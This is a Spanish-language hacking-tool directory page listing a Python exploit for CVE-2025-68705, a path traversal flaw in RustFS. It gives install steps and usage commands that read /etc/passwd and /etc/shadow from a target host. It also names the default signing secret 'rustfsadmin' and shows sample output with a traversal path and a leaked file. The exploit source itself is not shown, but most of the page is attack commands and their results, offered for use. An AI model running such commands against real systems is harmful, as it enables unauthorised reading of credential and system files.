Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-68705 — CVE-2025-68705 RustFS Verificación de Vulnerabilidad de Path Traversal | Kitploit
Herramientas/GitHubGitHub/imjdl/cve-2025-68705
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubimjdl/cve-2025-68705

CVE-2025-68705

CVE-2025-68705 RustFS Verificación de Vulnerabilidad de Path Traversal

Ver Repositorio
1hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-68705 - Exploit de Path Traversal en RustFS

Descripción

Este script explota una vulnerabilidad de path traversal (CVE-2025-68705) en RustFS que permite leer archivos arbitrarios en el servidor.

Requisitos

  • Python 3.6+
  • Consulta requirements.txt para las dependencias

Instalación

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt

Uso

root@kitploit:~
python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]

Argumentos requeridos

ArgumentoDescripción
-H, --hostDirección IP o nombre de host del objetivo
-p, --portNúmero de puerto del objetivo
-f, --fileRuta del archivo a leer (opcional con --check-only)

Argumentos opcionales

Ejemplos

Leer el archivo /etc/passwd

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd

Leer /etc/shadow con desplazamiento y longitud personalizados

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024

Usar clave secreta personalizada

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret

Solo comprobar si el objetivo es vulnerable

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 --check-only

Leer un rango específico del archivo

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200

Ejemplo de salida

root@kitploit:~
python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!

[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1       localhost
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp

Licencia

Este proyecto está licenciado bajo la Licencia MIT - consulta el archivo LICENSE para más detalles.

Referencias

  • Aviso de seguridad de RustFS
  • CVE-2025-68705
Descargar herramienta
ArgumentoDescripciónPor defecto
-s, --secretClave secreta para la firmarustfsadmin
-o, --offsetDesplazamiento de lectura del archivo0
-l, --lengthNúmero de bytes a leer4096
--check-onlySolo comprobar si el objetivo es vulnerable-